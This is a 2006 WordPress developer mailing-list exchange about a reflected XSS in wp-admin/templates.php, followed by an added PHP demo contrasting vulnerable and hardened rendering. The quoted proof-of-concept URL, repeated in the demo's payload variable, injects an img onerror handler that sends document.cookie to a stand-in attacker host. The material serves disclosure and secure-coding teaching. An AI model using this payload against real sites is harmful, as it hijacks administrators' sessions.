[wp-hackers] XSS Vulnerability

dabos daboslab at gmail.com
Fri Dec 29 13:13:52 GMT 2006


Thanks Ryan :)
Dario Salvelli - ICT Junior Student, Italy
Web Site/Blog: www.dariosalvelli.com

Contact:

Gtalk - dariosalvelli-at-gmail-dot-com
Msn - el_cantore-at-hotmail-dot-it
Skype - dariosalvelli


----- Original Message ----- 
From: "Ryan Boren" <ryan at boren.nu>
To: <wp-hackers at lists.automattic.com>
Sent: Thursday, December 28, 2006 6:48 PM
Subject: Re: [wp-hackers] XSS Vulnerability


> On 12/28/06, dabos <daboslab at gmail.com> wrote:
> >
> > Hi guys. Tell me more about this XSS vulnerability for WP 2.0.5 in
> > wp-admin/templates.php?
> >
> > Proof of concept:
> >
> > https://blogsite/wp/wp-admin/templates.php?file=<img src=""onerror=javascript:document.location.href='http://evilhacker/capturecookie.php?'+document.cookie;>
> >
> > Is this the solution: http://trac.wordpress.org/changeset/4665 ?
> >
> > The last question: when is the 2.0.6 final version? Isn't this
> > vulnerability in the 2.0.6 RC 1?
>
>
>
> For your testing pleasure:
>
> http://wordpress.org/beta/wordpress-2.0.6-RC2.zip
>
> Ryan
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
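
The proof of concept quoted above is a reflected XSS: the value of the `file` query parameter is written back into the template editor page unescaped, so an `<img>` with an `onerror` handler is rendered and runs in the context of whoever loaded the URL. Because templates.php sits behind the WordPress admin login, the victim has to be a logged-in administrator who follows the link, and `document.cookie` then leaks that administrator's session cookies to the attacker's host. The PHP below is an added example written for this page; it is not WordPress code and does not reproduce changeset 4665. It shows the reflection pattern beside a hardened version that both validates `file` against an allow-list and escapes it on output. The function names, the allow-list contents and the sample payload are assumptions made for the demo.

```php
<?php
// Added example, not WordPress code: the reflection pattern behind a
// templates.php-style XSS, and a hardened version. Function names, the
// allow-list and the sample request value are assumptions for this demo.

// Constructed input: the PoC payload from the thread, as it would arrive
// in $_GET['file'] after URL decoding.
$payload = '<img src=""onerror=javascript:document.location.href='
         . "'http://evilhacker/capturecookie.php?'+document.cookie;>";

// Vulnerable pattern: the raw query value is echoed into page text and
// into a hidden form field. The browser parses the <img ...> in the
// heading, src="" fails to load, and the onerror handler executes.
function render_editor_vulnerable(string $file): string {
    return "<h2>Editing $file</h2>\n"
         . "<input type=\"hidden\" name=\"file\" value=\"$file\" />\n";
}

// Hardened pattern, two independent layers:
//   1. validate: only a name from the allow-list is accepted (in a real
//      editor the list would be built from the theme directory listing);
//   2. escape: anything echoed goes through htmlspecialchars() with
//      ENT_QUOTES, so <, >, " and ' cannot break out of text or attribute
//      context even if the validation layer were ever bypassed.
function validate_file(string $file, array $allowed): string {
    if (!in_array($file, $allowed, true)) {
        throw new InvalidArgumentException('file is not in the editable list');
    }
    return $file;
}

function render_editor_hardened(string $file, array $allowed): string {
    $file = validate_file($file, $allowed);
    $safe = htmlspecialchars($file, ENT_QUOTES, 'UTF-8');
    return "<h2>Editing $safe</h2>\n"
         . "<input type=\"hidden\" name=\"file\" value=\"$safe\" />\n";
}

// Assumed allow-list for the demo.
$allowed = ['index.php', 'style.css', 'header.php'];

echo "--- vulnerable output (markup survives intact) ---\n";
echo render_editor_vulnerable($payload);

echo "--- hardened output: payload rejected by the allow-list ---\n";
try {
    echo render_editor_hardened($payload, $allowed);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

echo "--- hardened output: legitimate file renders normally ---\n";
echo render_editor_hardened('style.css', $allowed);

echo "--- escaping alone, for comparison ---\n";
// Shows what the payload becomes once entity-encoded: inert text.
echo htmlspecialchars($payload, ENT_QUOTES, 'UTF-8'), "\n";
```

Run it with `php` on the command line and compare the first and last sections: the vulnerable renderer emits the `<img ... onerror=...>` tag verbatim, while the escaped form turns every `<`, `>`, `"` and `'` into an entity so the browser shows the payload as text. Validation is the primary fix here because the parameter names a file the editor will open and write, so rejecting unknown names closes more than the XSS; output escaping is kept as the second layer so a future change to the validation logic does not silently reintroduce the injection.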